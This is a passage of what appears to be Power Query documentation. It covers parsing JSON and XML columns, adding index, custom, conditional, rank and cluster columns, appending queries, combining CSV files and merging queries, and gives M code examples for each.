the contents as either a JSON or XML text string.

You can perform this parse operation by selecting the Parse button found inside the
following places in the Power Query Editor:

Transform tab—This button will transform the existing column by parsing its
contents.

Add column tab—This button will add a new column to the table parsing the
contents of the selected column.

For this article, you'll be using the following sample table that contains the following
columns that you need to parse:

SalesPerson—Contains unparsed JSON text strings with information about the


FirstName and LastName of the sales person, as in the following example.

JSON

{
"id" : 249319,
"FirstName": "Lesa",
"LastName": "Byrd"
}
Country—Contains unparsed XML text strings with information about the Country
and the Division that the account has been assigned to, as in the following
example.

XML

<root>
<id>1</id>
<Country>USA</Country>
<Division>BI-3316</Division>
</root>

The sample table looks as follows.

The goal is to parse the columns mentioned above and expand their contents to get this
output.

As JSON
Select the SalesPerson column. Then select JSON from the Parse dropdown menu inside
the Transform tab. These steps will transform the SalesPerson column from having text
strings to having Record values, as shown in the next image. You can select anywhere in
the whitespace inside the cell of the Record value to get a detailed preview of the
record contents at the bottom of the screen.
Select the expand icon next to the SalesPerson column header. From the expand
columns menu, select only the FirstName and LastName fields, as shown in the
following image.

The result of that operation will give you the following table.
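In M, the parse and expand steps can be sketched with Json.Document and
Table.ExpandRecordColumn, assuming the previous step of your query is named Source:

Power Query M

let
    // Parse each JSON text string in the SalesPerson column into a record.
    ParsedJson = Table.TransformColumns(Source, {{"SalesPerson", Json.Document}}),
    // Expand only the FirstName and LastName fields of the parsed records.
    Expanded = Table.ExpandRecordColumn(ParsedJson, "SalesPerson", {"FirstName", "LastName"})
in
    Expanded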

As XML
Select the Country column. Then select the XML button from the Parse dropdown menu
inside the Transform tab. These steps will transform the Country column from having
text strings to having Table values as shown in the next image. You can select anywhere
in the whitespace inside the cell of the Table value to get a detailed preview of the
contents of the table at the bottom of the screen.

Select the expand icon next to the Country column header. From the expand columns
menu, select only the Country and Division fields, as shown in the following image.

You can define all the new columns as text columns. The result of that operation will
give you the output table that you're looking for.
Add a column from examples
Article • 12/17/2022

When you add columns from examples, you can quickly and easily create new columns
that meet your needs. This is useful for the following situations:

You know the data you want in your new column, but you're not sure which
transformation, or collection of transformations, will get you there.
You already know which transformations you need, but you're not sure what to
select in the UI to make them happen.
You know all about the transformations you need by using a custom column
expression in the M language, but one or more of those transformations aren't
available in the UI.

The Column from examples command is located on the Add column tab, in the
General group.

Add a new column from examples


In this example, you start with the table shown in the following image.
Your goal in this example is to create two new columns:

Range: Create bins for the Monthly Income column in discrete increments of
5,000.
Full Name: Concatenate the Last Name and First Name columns to a single
column.

Column from examples, from selected columns


One of the options you have when creating your new column is to select which columns
will be used in your calculations. For this example, you'll be creating the Range column
from the values in the Monthly Income column.

To do this, select the Monthly Income column, select the Column from examples
command, and then select From selection.
The preview pane displays a new, editable column where you can enter your examples.
For the first example, the value from the selected column is 19500. So in your new
column, enter the text 15000 to 20000, which is the bin where that value falls.

When Power Query finds a matching transformation, it fills the transformation results
into the remaining rows using light-colored text. You can also see the M formula text for
the transformation above the table preview.

After you select OK, you'll see your new column as part of your query. You'll also see a
new step added to your query.

Column from examples, from all columns


The next goal is to create a Full Name column by using the values from the First Name
and Last Name columns.

To do this, select the Column from examples command, and then select From all
columns.
Now you'll enter your first Full Name example as Enders, Maria.

After you select OK, you'll see your new column as part of your query. You'll also see a
new step added to your query.

Your last step is to remove the First Name, Last Name, and Monthly Income columns.
Your final table now contains the Range and Full Name columns with all the data you
produced in the previous steps.
Tips and considerations
When providing examples, Power Query offers a helpful list of available fields, values,
and suggested transformations for the selected columns. You can view this list by
selecting any cell of the new column.

It's important to note that the Column from examples experience works only on the top
100 rows of your data preview. You can apply steps before the Column from examples
step to create your own data sample. After the Column from examples column has
been created, you can delete those prior steps; the newly created column won't be
affected.

List of supported transformations


Many, but not all, transformations are available when you use Column from examples.
The following list shows the supported transformations.

General
Conditional Column

Reference

Reference to a specific column, including trim, clean, and case transformations

Text transformations

Combine (supports combination of literal strings and entire column values)


Replace
Length
Extract
First Characters
Last Characters
Range
Text before Delimiter
Text after Delimiter
Text between Delimiters
Length
Remove Characters
Keep Characters

7 Note

All Text transformations take into account the potential need to trim, clean, or apply
a case transformation to the column value.

Date transformations

Day
Day of Week
Day of Week Name
Day of Year
Month
Month Name
Quarter of Year
Week of Month
Week of Year
Year
Age
Start of Year
End of Year
Start of Month
End of Month
Start of Quarter
Days in Month
End of Quarter
Start of Week
End of Week
Day of Month
Start of Day
End of Day

Time transformations

Hour
Minute
Second
To Local Time

7 Note

All Date and Time transformations take into account the potential need to convert
the column value to Date, Time, or DateTime.

Number transformations

Absolute Value
Arccosine
Arcsine
Arctangent
Convert to Number
Cosine
Cube
Divide
Exponent
Factorial
Integer Divide
Is Even
Is Odd
Ln
Base-10 Logarithm
Modulo
Multiply
Round Down
Round Up
Sign
Sine
Square Root
Square
Subtract
Sum
Tangent
Bucketing/Ranges
Add an index column
Article • 12/17/2022

The Index column command adds a new column to the table with explicit position
values, and is usually created to support other transformation patterns.

By default, the index starts from the value 0 and increments by 1 per
row.
You can also configure the behavior of this step by selecting the Custom option and
configuring two parameters:

Starting index: Specifies the initial index value.


Increment: Specifies how much to increment each index value.

For the example in this article, you start with the following table that has only one
column, but notice the data pattern in the column.

Let's say that your goal is to transform that table into the one shown in the following
image, with the columns Date, Account, and Sale.

Step 1. Add an index column


You first need to add a new Index column to your table that starts from 0.

Step 2. Add a modulo column from the index


column
The next step is to select the newly added index column, and then on the Add column
tab, select Standard > Modulo.

In the Modulo dialog box, enter the number from which to find the remainder for each
value in the column. In this case, your pattern repeats itself every three rows, so you'll
enter 3.
The result of that operation will give you a new column named Modulo.

Step 3. Add an integer-divide column from the


index column
Select the Index column, go to the Add column tab, and then select Standard > Divide
(Integer).
In the Integer-divide dialog box, enter a number by which to divide each value in the
column. In this case, your pattern repeats itself every three rows, so enter the value 3.

Remove the Index column, because you no longer need it. Your table now looks like the
following image.
Step 4. Pivot a column
Your table now has three columns where:

Column1 contains the values that should be in the final table.


Modulo provides the column position of the value (similar to the y coordinates of
an xy chart).
Integer-division provides the row position of the value (similar to the x
coordinates of an xy chart).

To achieve the table you want, you need to pivot the Modulo column by using the
values from Column1 where these values don't get aggregated. On the Transform tab,
select the Modulo column, and then select Pivot column from the Any column group.
In the Pivot column dialog box, select the Advanced option button. Make sure Value
column is set to Column1 and Aggregate values function is set to Don't aggregate.

More information: Pivot columns

The result of that operation will give you a table with four columns, as shown in the
following image.

Step 5. Clean the table


You can now delete the Integer-division column and promote the first row of the table
to become the headers of your table. More information: Promote or demote column
headers

After defining the correct data types for your columns, you'll create a table that looks
like the following table, with exactly the three columns that you needed and the shape
that you were looking for.
Add a custom column
Article • 12/17/2022

If you need more flexibility for adding new columns than the ones provided out of the
box in Power Query, you can create your own custom column using the Power Query M
formula language.

Imagine that you have a table with the following set of columns.

Using the Units, Unit Price, and Discount columns, you'd like to create two new
columns:

Total Sale before Discount: Calculated by multiplying the Units column times the
Unit Price column.
Total Sale after Discount: Calculated by multiplying the Total Sale before Discount
column by the net percentage value (one minus the discount value).

The goal is to create a table with new columns that contain the total sales before the
discount and the total sales after the discount.

Create a custom column


On the Add column tab, select Custom column.
The Custom column dialog box appears. This dialog box is where you define the
formula to create your column.

The Custom column dialog box contains:

The initial name of your custom column in the New column name box. You can
rename this column.

A dropdown menu where you can select the data type for your new column.

An Available columns list on the right underneath the Data type selection.

A Custom column formula box where you can enter a Power Query M formula.

To add a new custom column, select a column from the Available columns list. Then,
select the Insert column button below the list to add it to the custom column formula.
You can also add a column by selecting it in the list. Alternatively, you can write your
own formula by using the Power Query M formula language in Custom column formula.
7 Note

If a syntax error occurs when you create your custom column, you'll see a yellow
warning icon, along with an error message and reason.

Adding the Total Sale before Discount column


The formula you can use to create the Total Sale before Discount column is [Units] *
[Unit Price]. In Data type, select the Currency data type.

The result of that operation adds a new Total Sale before Discount column to your
table.
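Behind the scenes, the custom column is added with the Table.AddColumn function. A minimal
sketch of this first column, assuming the previous step of your query is named Source:

Power Query M

// Add the Total Sale before Discount column, typed as Currency.
Table.AddColumn(Source, "Total Sale before Discount", each [Units] * [Unit Price], Currency.Type)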

7 Note
If you're using Power Query Desktop, you'll notice that the Data type field isn't
available in Custom column. This means that you'll need to define a data type for
any custom columns after creating the columns. More information: Data types in
Power Query

Adding the Total Sale after Discount column


The formula that you can use to create the Total Sale after Discount column is [Total Sale
before Discount] * (1 - [Discount]). Set the data type of this new column to Currency.

The result of that operation adds a new Total Sale after Discount column to your table.

Modify an existing custom column


Power Query adds your custom column to the table and adds the Added custom step to
the Applied steps list in Query settings.
To modify your custom column, select the Added custom step in the Applied steps list.

The Custom column dialog box appears with the custom column formula you created.

7 Note

Depending on the formula you've used for your custom column, Power Query
changes the settings behavior of your step for a more simplified and native
experience. For this example, the Added custom step changed its behavior from a
standard custom column step to a Multiplication experience because the formula
from that step only multiplies the values from two columns.

Next steps
You can create a custom column in other ways, such as creating a column based on
examples you provide to Power Query Editor. More information: Add a column
from an example
For Power Query M reference information, go to Power Query M function
reference.
Add a conditional column
Article • 12/17/2022

With Power Query, you can create new columns whose values will be based on one or
more conditions applied to other columns in your table.

The Conditional column command is located on the Add column tab, in the General
group.

Adding a conditional column


In this example, you'll be using the table shown in the following image.

In this table, you have a field that gives you the CustomerGroup. You also have different
prices applicable to that customer in the Tier 1 Price, Tier 2 Price, and Tier 3 Price fields.
In this example, your goal is to create a new column with the name Final Price based on
the value found in the CustomerGroup field. If the value in the CustomerGroup field is
equal to 1, you'll want to use the value from the Tier 1 Price field; otherwise, you'll use
the value from the Tier 3 Price.

To add this conditional column, select Conditional column. In the Add conditional
column dialog box, you can define three sections numbered in the following image.
1. New column name: You can define the name of your new column. In this example,
you'll use the name Final Price.
2. Conditional clauses: Here you define your conditional clauses. You can add more
clauses by selecting Add clause. Each conditional clause will be tested on the order
shown in the dialog box, from top to bottom. Each clause has four parts:

Column name: In the drop-down list, select the column to use for the
conditional test. For this example, select CustomerGroup.
Operator: Select the type of test or operator for the conditional test. In this
example, the value from the CustomerGroup column has to be equal to 1, so
select equals.
Value: You can enter a value or select a column to be used for the conditional
test. For this example, enter 1.
Output: If the test is positive, the value entered here or the column selected
will be the output. For this example, if the CustomerGroup value is equal to 1,
your Output value should be the value from the Tier 1 Price column.

3. Final Else clause: If none of the clauses above yield a positive test, the output of
this operation will be the one defined here, as a manually entered value or a value
from a column. In this case, the output will be the value from the Tier 3 Price
column.

The result of that operation will give you a new Final Price column.
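The conditional column is translated into a Table.AddColumn step with an if expression. A
minimal sketch, assuming the previous step of your query is named Source:

Power Query M

// If CustomerGroup is 1, use Tier 1 Price; otherwise fall back to Tier 3 Price.
Table.AddColumn(Source, "Final Price", each if [CustomerGroup] = 1 then [Tier 1 Price] else [Tier 3 Price])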

7 Note
New conditional columns won't have a data type defined. You can add a new step
to define a data type for this newly created column by following the steps
described in Data types in Power Query.

Adding and organizing multiple clauses


For this example, let's change your goal. Your new conditional clauses are:

If the value from the CustomerGroup column is equal to 1, the Output will be the
value from the Tier 1 Price column.
If the value from the CustomerGroup column is equal to 2, the Output will be the
value from the Tier 2 Price column.
If none of the previous tests are positive, the Output will be the value from the Tier
3 Price column.

7 Note

At the end of each clause, you can select the ellipsis button (...) to delete, move up,
or move down the clause.

The result of that operation will give you the result that you're looking for.
Rank column (Preview)
Article • 07/30/2022

The Rank column command adds a new column to a table with the ranking defined by
one or more other columns from the table. A Rank method option can be used to
define how ties should be handled.

7 Note

Currently, the rank column feature is only available in Power Query Online.

Adding a rank column


The following table has fields for Team, Total Points, and Bonus modifier. Imagine that
you're tasked with the creation of a new column that effectively ranks the teams using
the values from the Total Points and Bonus modifier fields.

Team Total Points Bonus modifier

A 20 0.5

B 30 0.8

C 40 0.2

D 10 0.45

E 20 0.75

The teams have shared a list of ways that they want to rank each other:

Using only the values from the Total Points field where higher values rank higher
using standard competition as the rank method
Using only the values from the Total Points field where higher values rank higher
using dense as the rank method
Ranking first by the Total Points and then by Bonus modifier where higher values
rank higher using the standard competition as rank method

Single column rank


For the first requirement shared by the teams of using only the values from the Total
Points field where higher values rank higher using standard competition as the rank
method, use the following steps:

1. With the original table already in Power Query, select the Total Points column.
Then from the Power Query Add column tab, select Rank column.

2. In Rank, Rank by will be the field selected ( Total Points ) and the Rank criteria will
be Higher value ranks higher.

3. By default, the rank method for this dialog is standard competition, so just select
OK. This action will give you a new step with the added Rank column.

Single column rank with specific rank method


For the second requirement shared by the teams of using only the values from the
Total Points field where higher values rank higher using dense as the rank method, use
the following steps:

1. With the original table already in Power Query, select the Total Points column.
Then from the Power Query Add column tab, select Rank column.

2. In Rank, Rank by will be the field selected ( Total Points ) and the Rank criteria will
be Higher value ranks higher.

3. Select Advanced at the top of the dialog box. This selection enables the advanced
section. In Rank method, change the value from Standard competition to Dense.

4. After selecting the rank method, select OK. This action will give you a new step
with the added Rank column.

Multiple column rank with specific rank method


For the third requirement shared by the teams of ranking first by the Total Points and
then by Bonus modifier where higher values rank higher using the standard competition
as rank method, use the following steps:
1. With the original table already in Power Query, select the Total Points and then
Bonus modifier columns. Then from the Power Query Add column tab, select Rank
column.

2. The rank dialog appears with its advanced section open, with both fields selected
in the Rank by column. Total Points is in the first row and then Bonus modifier
below it. Both rows use the Rank criteria of Higher value ranks higher.

3. Make sure that Rank method at the bottom is set to Standard competition.

4. After verifying the above, select OK. This action will give you a new step with the
added Rank column.

Rank methods
A rank method establishes the strategy in which ties are handled by the ranking
algorithm. This option is only available in the advanced section of the Rank dialog.

The following table lists all three available rank methods and provides a description for
each.
Rank method Description

Standard competition Items that compare equally receive the same ranking number, and then a gap is left in the ranking numbers. For example, 1224.

Dense Items that compare equally receive the same ranking number, and the next items receive the immediately following ranking number. For example, 1223.

Ordinal All items receive distinct ordinal numbers, including items that compare equally. For example, 1234.
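
In M, the rank method corresponds to the RankKind option of Table.AddRankColumn, and multiple ranking columns are passed as a list of criteria. The following sketch covers the third requirement (rank by Total Points, then by Bonus modifier, using standard competition), assuming the previous step is named Source; swap in RankKind.Dense or RankKind.Ordinal to use the other methods.

Power Query M

= Table.AddRankColumn(
    Source,
    "Rank",
    {{"Total Points", Order.Descending}, {"Bonus modifier", Order.Descending}},
    [RankKind = RankKind.Competition])
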
Cluster values
Article • 12/17/2022

The Cluster values command automatically creates groups of similar values by using a
fuzzy matching algorithm, and then maps each column value to the best-matched group.
This transform is very useful when you're working with data that has many different
variations of the same value and you need to combine those values into consistent groups.

Consider a sample table with an id column that contains a set of IDs and a Person
column containing a set of variously spelled and capitalized versions of the names
Miguel, Mike, William, and Bill.

In this example, the outcome you're looking for is a table with a new column that shows
the right groups of values from the Person column and not all the different variations of
the same words.
7 Note

The Cluster values feature is available only for Power Query Online.

Create a Cluster column


To cluster values, first select the Person column, go to the Add column tab in the
ribbon, and then select the Cluster values option.

In the Cluster values dialog box, confirm the column that you want to use to create the
clusters from, and enter the new name of the column. For this case, name this new
column Cluster.

The result of that operation yields the result shown in the next image.
7 Note

For each cluster of values, Power Query picks the most frequent instance from the
selected column as the "canonical" instance. If multiple instances occur with the
same frequency, Power Query picks the first one.
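
In M, this command maps to the Table.AddFuzzyClusterColumn function. The following is a minimal sketch, assuming the previous step is named Source; the fuzzy cluster options described in the next section can be supplied through the optional fourth argument as a record.

Power Query M

// Cluster the values in the Person column into a new Cluster column
= Table.AddFuzzyClusterColumn(
    Source,
    "Person",
    "Cluster")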

Using the fuzzy cluster options


The following options are available for clustering values in a new column:

Similarity threshold (optional): This option indicates how similar two values must
be to be grouped together. The minimum setting of 0 causes all values to be
grouped together. The maximum setting of 1 only allows values that match exactly
to be grouped together. The default is 0.8.
Ignore case: When comparing text strings, case is ignored. This option is enabled
by default.
Group by combining text parts: The algorithm tries to combine text parts (such as
combining Micro and soft into Microsoft) to group values.
Show similarity scores: Shows similarity scores between the input values and
computed representative values after fuzzy clustering.
Transformation table (optional): You can select a transformation table that maps
values (such as mapping MSFT to Microsoft) to group them together.

For this example, a new transformation table with the name My transform table is used
to demonstrate how values can be mapped. This transformation table has two columns:

From: The text string to look for in your table.


To: The text string to use to replace the text string in the From column.
) Important

It's important that the transformation table has the same columns and column
names as shown in the previous image (they have to be named "From" and "To"),
otherwise Power Query won't recognize this table as a transformation table, and no
transformation will take place.

Using the previously created query, double-click the Clustered values step, then in the
Cluster values dialog box, expand Fuzzy cluster options. Under Fuzzy cluster options,
enable the Show similarity scores option. For Transformation table (optional), select
the query that has the transform table.
After selecting your transformation table and enabling the Show similarity scores
option, select OK. The result of that operation will give you a table that contains the
same id and Person columns as the original table, but also includes two new columns
on the right called Cluster and Person_Cluster_Similarity. The Cluster column contains
the properly spelled and capitalized versions of the names Miguel for versions of Miguel
and Mike, and William for versions of Bill, Billy, and William. The
Person_Cluster_Similarity column contains the similarity scores for each of the names.
Append queries
Article • 12/17/2022

The append operation creates a single table by adding the contents of one or more
tables to another, and aggregates the column headers from the tables to create the
schema for the new table.

7 Note

When tables that don't have the same column headers are appended, all column
headers from all tables are appended to the resulting table. If one of the appended
tables doesn't have a column header from other tables, the resulting table shows
null values in the respective column, as shown in the previous image in columns C
and D.

You can find the Append queries command on the Home tab in the Combine group.
On the drop-down menu, you'll see two options:

Append queries displays the Append dialog box to add additional tables to the
current query.
Append queries as new displays the Append dialog box to create a new query by
appending multiple tables.

The append operation requires at least two tables. The Append dialog box has two
modes:
Two tables: Combine two table queries together. This mode is the default mode.
Three or more tables: Allow an arbitrary number of table queries to be combined.

7 Note

The tables will be appended in the order in which they're selected, starting with the
Primary table for the Two tables mode and from the primary table in the Tables to
append list for the Three or more tables mode.

Append two tables


For the example in this article, we'll use the following two tables with sample data:

Online Sales: Sales made through an online channel.

Store Sales: Sales made through the company's physical locations.

To append these tables, first select the Online Sales table. On the Home tab, select
Append queries, which creates a new step in the Online Sales query. The Online Sales
table will be the primary table. The table to append to the primary table will be Store
Sales.
Power Query performs the append operation based on the names of the column
headers found on both tables, and not based on their relative position in the headers
sections of their respective tables. The final table will have all columns from all tables
appended.

In the event that one table doesn't have columns found in another table, null values will
appear in the corresponding column, as shown in the Referer column of the final query.

Append three or more tables


In this example, you want to append not only the Online Sales and Store Sales tables,
but also a new table named Wholesale Sales.

The new approach for this example is to select Append queries as new, and then in the
Append dialog box, select the Three or more tables option button. In the Available
table(s) list, select each table you want to append, and then select Add. After all the
tables you want appear in the Tables to append list, select OK.

After selecting OK, a new query will be created with all your tables appended.
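
In M, both append options are expressed with the Table.Combine function, which appends a list of tables in the order they're listed. A minimal sketch for this example, assuming the three queries keep the names shown above:

Power Query M

= Table.Combine({#"Online Sales", #"Store Sales", #"Wholesale Sales"})
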
Combine files overview
Article • 02/17/2023

With Power Query, you can combine multiple files that have the same schema into a
single logical table.

This feature is useful when you want to combine all the files you have in the same folder.
For example, if you have a folder that contains monthly files with all the purchase orders
for your company, you can combine these files to consolidate the orders into a single
view.

Files can come from a variety of sources, such as (but not limited to):

Local folders
SharePoint sites
Azure Blob storage
Azure Data Lake Storage (Gen1 and Gen2)

When working with these sources, you'll notice that they share the same table schema,
commonly referred to as the file system view. The following screenshot shows an
example of the file system view.

In the file system view, the Content column contains the binary representation of each
file.

7 Note

You can filter the list of files in the file system view by using any of the available
fields. It's good practice to filter this view to show only the files you need to
combine, for example by filtering fields such as Extension or Folder Path. More
information: Folder

Selecting any of the [Binary] values in the Content column automatically creates a series
of navigation steps to that specific file. Power Query will try to interpret the binary by
using one of the available connectors, such as Text/CSV, Excel, JSON, or XML.
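
For example, if the folder contains CSV files, each [Binary] value can be interpreted with the Csv.Document function. The following sketch, written against a hypothetical local folder path, filters the file system view down to .csv files and parses the first binary; the Combine files experience described below automates these steps for every file in the list.

Power Query M

let
    // File system view of the folder (hypothetical path)
    Source = Folder.Files("C:\Sample\CSV Files"),
    // Keep only the files you intend to combine
    CsvFiles = Table.SelectRows(Source, each [Extension] = ".csv"),
    // Interpret the first binary by using the Text/CSV connector
    FirstFile = Csv.Document(CsvFiles{0}[Content])
in
    FirstFile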

Combining files takes place in the following stages:

Table preview
Combine files dialog box
Combined files output

Table preview
When you connect to a data source by using any of the previously mentioned
connectors, a table preview opens. If you're certain that you want to combine all the files
in the folder, select Combine in the lower-right corner of the screen.

Alternatively, you can select Transform data to access the Power Query Editor and
create a subset of the list of files (for example, by using filters on the folder path column
to only include files from a specific subfolder). Then combine files by selecting the
column that contains the binaries in the Content column and then selecting either:

The Combine files command in the Combine group on the Home tab.
The Combine files icon in the column header of the column that contains [Binary]
values.

Combine files dialog box


After you select the Combine or Combine files command, the Combine files dialog box
opens and the following occurs:

1. Power Query analyzes the example file (by default, the first file in the list) and
determines the correct file connector to use to open that file.
2. The dialog box provides the file connector experience exactly as if you were to
connect directly to that example file.

If you want to use a different file for the example file, you can choose it from
the Example file drop-down menu.
Optional: You can select Skip files with errors to exclude from the final
output any files that result in errors.

In the following image, Power Query has detected that the first file has a .csv file name
extension, so it uses the Text/CSV connector to interpret the file.
Combined files output
After the Combine files process is finished, Power Query automatically performs the
following actions:

1. Creates an example query that performs all the required extraction steps for a
single file. It uses the file that was selected as the example file in the Combine files
dialog box.

This example query has the name Transform Sample file in the Queries pane.

2. Creates a function query that parameterizes the file/binary input to the example
query. The example query and the function query are linked, so that changes to
the example query are reflected in the function query.

These queries are listed in the Helper queries group.

3. Applies the function query to the original query with input binaries (for example,
the folder query) so it applies the function query for binary inputs on each row,
and then expands the resulting data extraction as top-level columns.

4. Creates a new group with the prefix Transform file from and the initial query as
the suffix, and organizes all the components used to create these combined files in
that group.
You can easily combine all files within a given folder, as long as they have the same file
type and structure (including the same columns). You can also apply additional
transformation or extraction steps by modifying the automatically generated example
query, without having to worry about modifying or creating additional function query
steps.

7 Note

You can modify the steps inside the example query to change the function applied
to each binary in your query. The example query is linked to the function, so any
changes made to the example query will be reflected in the function query.

If any of the changes affect column names or column data types, be sure to check
the last step of your output query. Adding a Change column type step can
introduce a step-level error that prevents you from visualizing your table. More
information: Dealing with errors

See also
Combine CSV files
Combine CSV files
Article • 02/17/2023

In Power Query, you can combine multiple files from a given data source. This article
describes how the experience works when the files that you want to combine are CSV
files. More information: Combine files overview

 Tip

You can follow along with this example by downloading the sample files used in
this article from this download link . You can place those files in the data source
of your choice, such as a local folder, SharePoint folder, Azure Blob storage, Azure
Data Lake Storage, or other data source that provides the file system view.

For simplicity, the example in this article uses the Folder connector. More information:
Folder

About the sample files used


To combine files, it's imperative that they all have the same structure and the same
extension. All the files used in this example have the same structure and extension (.csv).

There are 12 CSV files, one for each month of the calendar year 2019. The following
image shows the first 15 rows of the file for the month of January.
The number of rows varies from file to file, but all files have a header section in the first
four rows. They have column headers in the fifth row, and the data for the table begins
in the sixth row and continues through all subsequent rows.

The goal is to combine all 12 files into a single table. This combined table contains the
header row at the top of the table, and includes the source name, date, country, units,
and revenue data for the entire year in separate columns after the header row.
Table preview
When connecting to the folder that hosts the files that you want to combine—in this
example, the name of that folder is CSV Files—you're shown the table preview dialog
box, which displays your folder path in the upper-left corner. The data preview shows
the file system view.

For this example, select Combine.

7 Note
In a different situation, you might select Transform data to further filter and
transform your data before combining the files. Selecting Combine is only
recommended when you're certain that the folder contains only the files that you
want to combine.

Combine files dialog box


After you select Combine in the table preview, the Combine files dialog box appears.

7 Note

Power Query automatically detects what connector to use based on the first file
found in the list. To learn more about the CSV connector, go to Text/CSV.

For this example, leave all the default settings (Example file set to First file, and the
default values for File origin, Delimiter, and Data type detection).

Now select Transform data in the lower-right corner to go to the output query.
Output query
After selecting Transform data in the Combine files dialog box, you'll be taken back to
the Power Query Editor in the query that you initially created from the connection to the
local folder. The output query now contains the source file name in the left-most
column, along with the data from each of the source files in the remaining columns.

However, the data isn't in the correct shape. You need to remove the top four rows from
each file before combining them. To make this change in each file before you combine
them, select the Transform Sample file query in the Queries pane on the left side of
your screen.

Modify the Transform Sample file query


In this Transform Sample file query, the values in the Date column, which use the
year-month-day (YYYY-MM-DD) format, indicate that the data is for the month of April.
April 2019.csv is the first file that's displayed in the table preview.
You now need to apply a new set of transformations to clean the data. Each
transformation will be automatically converted to a function inside the Helper queries
group that will be applied to every file in the folder before combining the data from
each file.

The transformations that need to be added to the Transform Sample file query are:

1. Remove top rows: To perform this operation, select the table icon menu in the
upper-left corner of the table, and then select Remove top rows.
In the Remove top rows dialog box, enter 4, and then select OK.

After selecting OK, your table will no longer have the top four rows.
2. Use first row as headers: Select the table icon again, and then select Use first row
as headers.

The result of that operation will promote the first row of the table to the new
column headers.
After this operation is completed, Power Query by default will try to automatically detect
the data types of the columns and add a new Changed column type step.
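
If you'd like to see the equivalent M, removing the top rows and promoting the headers corresponds to the following two steps. This is only a sketch of what Power Query generates, assuming the preceding step in the Transform Sample file query is named Source; your step names may differ.

Power Query M

let
    // Remove the four header-section rows at the top of each file
    #"Removed Top Rows" = Table.Skip(Source, 4),
    // Promote the first remaining row to column headers
    #"Promoted Headers" = Table.PromoteHeaders(#"Removed Top Rows")
in
    #"Promoted Headers"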

Revising the output query


When you go back to the CSV Files query, you'll notice that the last step is giving you an
error that reads "The column 'Column1' of the table wasn't found." The reason behind
this error is that the previous state of the query was doing an operation against a
column named Column1. But because of the changes made to the Transform Sample
file query, this column no longer exists. More information: Dealing with errors in Power
Query
You can remove this last step of the query from the Applied steps pane by selecting the
X delete icon on the left side of the name of the step. After deleting this step, your
query will show the correct results.

However, notice that none of the columns derived from the files (Date, Country, Units,
Revenue) have a specific data type assigned to them. Assign the correct data type to
each column by using the following table.

Column name Data type

Date Date

Country Text

Units Whole number

Revenue Currency

After defining the data types for each column, you'll be ready to load the table.
7 Note

To learn how to define or change column data types, go to Data types.
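
In M, all of these assignments can be made in a single Table.TransformColumnTypes step. The following is a sketch only; PreviousStep is a hypothetical name for the last step of your output query.

Power Query M

= Table.TransformColumnTypes(
    PreviousStep,
    {{"Date", type date}, {"Country", type text},
     {"Units", Int64.Type}, {"Revenue", Currency.Type}})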

Verification
To validate that all files have been combined, you can select the filter icon on the
Source.Name column heading, which will display all the names of the files that have
been combined. If you get the warning "List may be incomplete," select Load more at
the bottom of the menu to display more available values in the column.
After you select Load more, all available file names will be displayed.
Merge queries overview
Article • 08/30/2023

A merge queries operation joins two existing tables together based on matching values
from one or multiple columns. You can choose to use different types of joins, depending
on the output you want.

Merging queries
You can find the Merge queries command on the Home tab, in the Combine group.
From the drop-down menu, you'll see two options:

Merge queries: Displays the Merge dialog box, with the selected query as the left
table of the merge operation.
Merge queries as new: Displays the Merge dialog box without any preselected
tables for the merge operation.

Identify tables for merging


The merge operation requires two tables:

Left table for merge: The first selection, from top to bottom of your screen.
Right table for merge: The second selection, from top to bottom of your screen.
7 Note

The position—left or right—of the tables becomes very important when you select
the correct join kind to use.

Select column pairs


After you've selected both the left and right tables, you can select the columns that
drive the join between the tables. In the example below, there are two tables:

Sales: The CountryID field is a key or an identifier from the Countries table.
Countries: This table contains the CountryID and the name of the country.
The goal is to join these tables by using the CountryID column from both tables, so you
select the CountryID column from each table. After you make the selections, a message
appears with an estimated number of matches at the bottom of the dialog box.

7 Note

Although this example shows the same column header for both tables, this isn't a
requirement for the merge operation. Column headers don't need to match
between tables. However, it's important to note that the columns must be of the
same data type, otherwise the merge operation might not yield correct results.

You can also select multiple columns to perform the join by holding Ctrl as you select
the columns. When you do so, the order in which the columns were selected is
displayed in small numbers next to the column headings, starting with 1.

For this example, you have the Sales and Countries tables. Each of the tables has
CountryID and StateID columns, which you need to pair for the join between both
columns.

First select the CountryID column in the Sales table, hold Ctrl, and then select the
StateID column. (This will show the small numbers in the column headings.) Next,
perform the same selections in the Countries table. The following image shows the
result of selecting those columns.

7 Note
When selecting multiple columns for a join, the order you select the columns in
each table must match. For example, the first column selected in the left table is
matched with the first column selected in the right table, and so on. Otherwise,
you'll observe incorrect join results.

Use the column pair suggestion


When selecting the left and right tables in the Merge dialog, you can select the lightbulb
icon in the upper-right corner of the dialog to check whether there are any suggestions
for mapping column pairs between the two tables.

There can be many suggestions, but in this scenario the feature offers only one:
mapping the CountryID column from the Sales table to the CountryID column from the
Countries table. When you select the suggestion, the column pair mapping is
automatically applied to the dialog.

7 Note
Only the column pair mapping is suggested. Other options in this dialog, such as
the join kind or the fuzzy matching configuration, aren't part of the suggestion.

Expand or aggregate the new merged table column


After selecting OK in the Merge dialog box, the base table of your query will have all the
columns from your left table. Also, a new column will be added with the same name as
your right table. This column holds the values corresponding to the right table on a row-
by-row basis.

From here, you can choose to expand or aggregate the fields from this new table
column, which will be the fields from your right table.

7 Note

Currently, the Power Query Online experience only provides the expand operation
in its interface. The option to aggregate will be added later this year.

Join kinds
A join kind specifies how a merge operation will be performed. The following table
describes the available join kinds in Power Query.
Join kind Icon Description

Left outer All rows from the left table, matching rows from the right table

Right outer All rows from the right table, matching rows from the left table

Full outer All rows from both tables

Inner Only matching rows from both tables

Left anti Only rows from the left table

Right anti Only rows from the right table
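
In M, a merge is commonly written with the Table.NestedJoin function, whose join kind argument takes one of the JoinKind values corresponding to the table above, followed by a Table.ExpandTableColumn step to expand the new table column. The following is a minimal sketch using the Sales and Countries example, assuming both queries exist under those names:

Power Query M

let
    // Join Sales (left) to Countries (right) on CountryID = id
    Merged = Table.NestedJoin(
        Sales, {"CountryID"},
        Countries, {"id"},
        "Countries",
        JoinKind.LeftOuter),
    // Expand only the Country field from the new table column
    Expanded = Table.ExpandTableColumn(Merged, "Countries", {"Country"})
in
    Expanded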

Fuzzy matching
You use fuzzy merge to apply fuzzy matching algorithms when comparing columns, to
try to find matches across the tables you're merging. You can enable this feature by
selecting the Use fuzzy matching to perform the merge check box in the Merge dialog
box. Expand Fuzzy matching options to view all available configurations.

7 Note
Fuzzy matching is only supported for merge operations over text columns.
Left outer join
Article • 12/17/2022

One of the join kinds available in the Merge dialog box in Power Query is a left outer
join, which keeps all the rows from the left table and brings in any matching rows from
